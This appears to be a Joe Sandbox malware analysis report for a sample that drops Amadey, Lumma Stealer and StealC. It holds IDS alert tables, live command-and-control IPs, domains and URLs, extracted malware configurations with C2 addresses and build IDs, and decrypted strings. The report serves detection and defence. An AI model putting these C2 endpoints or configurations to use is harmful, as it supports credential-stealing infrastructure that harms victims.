2024-11-10T04:56:25.008382+0100	2028371	3	Unknown Traffic	192.168.2.5	50140	188.114.97.3	443	TCP
2024-11-10T04:56:26.563142+0100	2028371	3	Unknown Traffic	192.168.2.5	50141	188.114.97.3	443	TCP
2024-11-10T04:56:28.051158+0100	2028371	3	Unknown Traffic	192.168.2.5	50142	188.114.97.3	443	TCP
2024-11-10T04:56:29.750080+0100	2028371	3	Unknown Traffic	192.168.2.5	50144	188.114.97.3	443	TCP
2024-11-10T04:56:32.642250+0100	2028371	3	Unknown Traffic	192.168.2.5	50149	188.114.97.3	443	TCP
2024-11-10T04:56:37.286610+0100	2028371	3	Unknown Traffic	192.168.2.5	50153	188.114.97.3	443	TCP
2024-11-10T04:56:39.034746+0100	2028371	3	Unknown Traffic	192.168.2.5	50154	188.114.97.3	443	TCP
2024-11-10T04:56:41.574133+0100	2028371	3	Unknown Traffic	192.168.2.5	50159	188.114.97.3	443	TCP
2024-11-10T04:56:43.831851+0100	2028371	3	Unknown Traffic	192.168.2.5	50160	188.114.97.3	443	TCP
2024-11-10T04:56:46.542401+0100	2028371	3	Unknown Traffic	192.168.2.5	50163	188.114.97.3	443	TCP
2024-11-10T04:56:48.903216+0100	2028371	3	Unknown Traffic	192.168.2.5	50165	188.114.97.3	443	TCP
2024-11-10T04:56:53.140066+0100	2028371	3	Unknown Traffic	192.168.2.5	50175	188.114.97.3	443	TCP
2024-11-10T04:56:55.819106+0100	2028371	3	Unknown Traffic	192.168.2.5	50181	188.114.97.3	443	TCP
2024-11-10T04:56:59.586073+0100	2028371	3	Unknown Traffic	192.168.2.5	50204	188.114.97.3	443	TCP
2024-11-10T04:57:06.053797+0100	2028371	3	Unknown Traffic	192.168.2.5	50249	188.114.97.3	443	TCP
2024-11-10T04:57:08.646736+0100	2028371	3	Unknown Traffic	192.168.2.5	50256	188.114.97.3	443	TCP
2024-11-10T04:57:17.074281+0100	2028371	3	Unknown Traffic	192.168.2.5	50260	188.114.97.3	443	TCP
2024-11-10T04:57:26.034158+0100	2028371	3	Unknown Traffic	192.168.2.5	50265	188.114.97.3	443	TCP
2024-11-10T04:57:28.343752+0100	2028371	3	Unknown Traffic	192.168.2.5	50267	188.114.97.3	443	TCP
2024-11-10T04:57:34.775431+0100	2028371	3	Unknown Traffic	192.168.2.5	50275	188.114.97.3	443	TCP
2024-11-10T04:57:38.006556+0100	2028371	3	Unknown Traffic	192.168.2.5	50277	188.114.97.3	443	TCP
2024-11-10T04:57:40.998751+0100	2028371	3	Unknown Traffic	192.168.2.5	50279	188.114.97.3	443	TCP
2024-11-10T04:59:45.297847+0100	2028371	3	Unknown Traffic	192.168.2.5	50350	51.11.192.48	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:22.813668+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50135	188.114.97.3	443	TCP
2024-11-10T04:56:24.095212+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50139	188.114.97.3	443	TCP
2024-11-10T04:56:40.427414+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50153	188.114.97.3	443	TCP
2024-11-10T04:56:40.866498+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50154	188.114.97.3	443	TCP
2024-11-10T04:56:42.462241+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50159	188.114.97.3	443	TCP
2024-11-10T04:57:00.244360+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50204	188.114.97.3	443	TCP
2024-11-10T04:57:07.951742+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50249	188.114.97.3	443	TCP
2024-11-10T04:57:09.812134+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50256	188.114.97.3	443	TCP
2024-11-10T04:57:41.703453+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50279	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:22.813668+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50135	188.114.97.3	443	TCP
2024-11-10T04:56:40.866498+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50154	188.114.97.3	443	TCP
2024-11-10T04:57:07.951742+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50249	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:24.095212+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50139	188.114.97.3	443	TCP
2024-11-10T04:56:42.462241+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50159	188.114.97.3	443	TCP
2024-11-10T04:57:09.812134+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50256	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:21.551602+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50135	188.114.97.3	443	TCP
2024-11-10T04:56:23.468839+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50139	188.114.97.3	443	TCP
2024-11-10T04:56:25.008382+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50140	188.114.97.3	443	TCP
2024-11-10T04:56:26.563142+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50141	188.114.97.3	443	TCP
2024-11-10T04:56:28.051158+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50142	188.114.97.3	443	TCP
2024-11-10T04:56:29.750080+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50144	188.114.97.3	443	TCP
2024-11-10T04:56:32.642250+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50149	188.114.97.3	443	TCP
2024-11-10T04:56:37.286610+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50153	188.114.97.3	443	TCP
2024-11-10T04:56:39.034746+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50154	188.114.97.3	443	TCP
2024-11-10T04:56:41.574133+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50159	188.114.97.3	443	TCP
2024-11-10T04:56:43.831851+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50160	188.114.97.3	443	TCP
2024-11-10T04:56:46.542401+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50163	188.114.97.3	443	TCP
2024-11-10T04:56:48.903216+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50165	188.114.97.3	443	TCP
2024-11-10T04:56:53.140066+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50175	188.114.97.3	443	TCP
2024-11-10T04:56:55.819106+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50181	188.114.97.3	443	TCP
2024-11-10T04:56:59.586073+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50204	188.114.97.3	443	TCP
2024-11-10T04:57:06.053797+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50249	188.114.97.3	443	TCP
2024-11-10T04:57:08.646736+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50256	188.114.97.3	443	TCP
2024-11-10T04:57:17.074281+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50260	188.114.97.3	443	TCP
2024-11-10T04:57:26.034158+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50265	188.114.97.3	443	TCP
2024-11-10T04:57:28.343752+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50267	188.114.97.3	443	TCP
2024-11-10T04:57:34.775431+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50275	188.114.97.3	443	TCP
2024-11-10T04:57:38.006556+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50277	188.114.97.3	443	TCP
2024-11-10T04:57:40.998751+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50279	188.114.97.3	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:41.631406+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	50158	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:10.922911+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50124	185.215.113.43	80	TCP
2024-11-10T04:56:14.893255+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50127	185.215.113.43	80	TCP
2024-11-10T04:56:21.154985+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50134	185.215.113.43	80	TCP
2024-11-10T04:56:35.969608+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50150	185.215.113.43	80	TCP
2024-11-10T04:56:39.895991+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50155	185.215.113.43	80	TCP
2024-11-10T04:56:45.674896+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50162	185.215.113.43	80	TCP

ET MALWARE Win32/Amadey Payload Request (GET) M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:07.905452+0100	2047626	1	A Network Trojan was detected	192.168.2.5	50122	185.215.113.16	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:20.760506+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	64943	1.1.1.1	53	UDP
2024-11-10T04:56:38.285826+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	60436	1.1.1.1	53	UDP
2024-11-10T04:57:05.306749+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	64332	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:20.786747+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	57799	1.1.1.1	53	UDP
2024-11-10T04:56:38.311766+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	63685	1.1.1.1	53	UDP
2024-11-10T04:57:05.333512+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	58636	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:20.866455+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	62063	1.1.1.1	53	UDP
2024-11-10T04:56:38.387680+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	62277	1.1.1.1	53	UDP
2024-11-10T04:57:05.407972+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	63365	1.1.1.1	53	UDP
2024-11-10T04:57:34.573247+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	49943	1.1.1.1	53	UDP
2024-11-10T04:57:57.446192+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	61469	1.1.1.1	53	UDP
2024-11-10T04:58:10.090309+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	57859	1.1.1.1	53	UDP
2024-11-10T04:58:27.197662+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	51185	1.1.1.1	53	UDP
2024-11-10T04:59:14.024592+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	53250	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:20.893111+0100	2057119	1	Domain Observed Used for C2 Detected	192.168.2.5	63559	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:20.838300+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	60590	1.1.1.1	53	UDP
2024-11-10T04:56:38.364400+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	51739	1.1.1.1	53	UDP
2024-11-10T04:57:05.382130+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	52614	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:20.735482+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	54209	1.1.1.1	53	UDP
2024-11-10T04:56:38.256803+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	62570	1.1.1.1	53	UDP
2024-11-10T04:57:05.281063+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	50231	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:20.810027+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	65272	1.1.1.1	53	UDP
2024-11-10T04:56:38.339782+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	56464	1.1.1.1	53	UDP
2024-11-10T04:57:05.359174+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	55979	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:54:59.595642+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	49704	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:54:59.589220+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:54:59.871782+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:55:01.065999+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:54:59.882206+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	49704	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:31.605717+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50144	188.114.97.3	443	TCP
2024-11-10T04:57:36.836946+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50275	188.114.97.3	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:54:59.307490+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-10T04:56:36.681774+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50151	185.215.113.206	80	TCP
2024-11-10T04:57:09.374105+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50255	185.215.113.206	80	TCP
2024-11-10T04:57:18.150922+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50261	185.215.113.206	80	TCP
2024-11-10T04:57:33.094118+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50273	185.215.113.206	80	TCP
2024-11-10T04:57:48.631192+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50284	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:04.556830+0100	2856147	1	A Network Trojan was detected	192.168.2.5	50104	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:09.999882+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	50116	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:07.905452+0100	2803305	3	Unknown Traffic	192.168.2.5	50122	185.215.113.16	80	TCP
2024-11-10T04:56:11.876005+0100	2803305	3	Unknown Traffic	192.168.2.5	50125	185.215.113.16	80	TCP
2024-11-10T04:56:15.824656+0100	2803305	3	Unknown Traffic	192.168.2.5	50128	185.215.113.16	80	TCP
2024-11-10T04:56:22.086716+0100	2803305	3	Unknown Traffic	192.168.2.5	50136	185.215.113.16	80	TCP
2024-11-10T04:56:40.839144+0100	2803305	3	Unknown Traffic	192.168.2.5	50156	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:55:01.620388+0100	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-10T04:55:22.374858+0100	2803304	3	Unknown Traffic	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:23.722191+0100	2803304	3	Unknown Traffic	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:24.407672+0100	2803304	3	Unknown Traffic	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:24.990948+0100	2803304	3	Unknown Traffic	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:26.639288+0100	2803304	3	Unknown Traffic	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:27.165061+0100	2803304	3	Unknown Traffic	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:31.346199+0100	2803304	3	Unknown Traffic	192.168.2.5	49905	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:32.725932+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50149	188.114.97.3	443	TCP
2024-11-10T04:56:58.794845+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50181	188.114.97.3	443	TCP
2024-11-10T04:57:38.010244+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50277	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/c4becf79229cb002.phpche	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/lf	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php0001	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedPM	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/A	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php3.43	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/X	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exeGB	Avira URL Cloud: Label: phishing
Source: 185.215.113.206/c4becf79229cb002.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Fru7Nk9/Plugins/clip.dll:::Main	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/fjnmnfpi	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/ViewSizePreferences.SourceAumid$w	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/(	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpIa9	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phptent-T	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/9	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllf	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Fru7Nk9/Plugins/clip.dll:::Mainos.dll	Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/c00b58987e8e4f4b2846d934f48b15eaa10a45	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpaa	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/luma/random.exe2	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.phpBr	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpU	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php/h	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpX	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php)a	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpf	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpl	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php6	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/2c2e-da81-46d0-b6b6-535557bcc5faXX	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpR;	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/Fo	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php(	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php-	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/apihpcRGN	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/SSC:	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000015.00000002.2449462094.0000000000561000.00000040.00000001.01000000.0000000B.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store", "founpiuer.store", "crisiwarny.store", "navygenerayk.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}
Source: 6ca8f7e5e2.exe.7720.35.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\clip[1].dll	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1005203011\clip.dll	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: file.exe	Virustotal: Detection: 36%			Perma Link
Source: file.exe	ReversingLabs: Detection: 28%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: scriptyprefej.store
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: navygenerayk.store
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: founpiuer.store
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: necklacedmny.store
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: thumbystriw.store
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: fadehairucw.store
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: crisiwarny.store
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: presticitpo.store
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: presticitpo.store
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: - Screen Resoluton:
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: Workgroup: -
Source: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack	String decryptor: 4SD0y4--legendaryy

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C7BA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B4440 PK11_PrivDecrypt,	0_2_6C7B4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C784420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C784420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B44C0 PK11_PubEncrypt,	0_2_6C7B44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C8025B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C798670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C798670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C7BA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C79E6E0
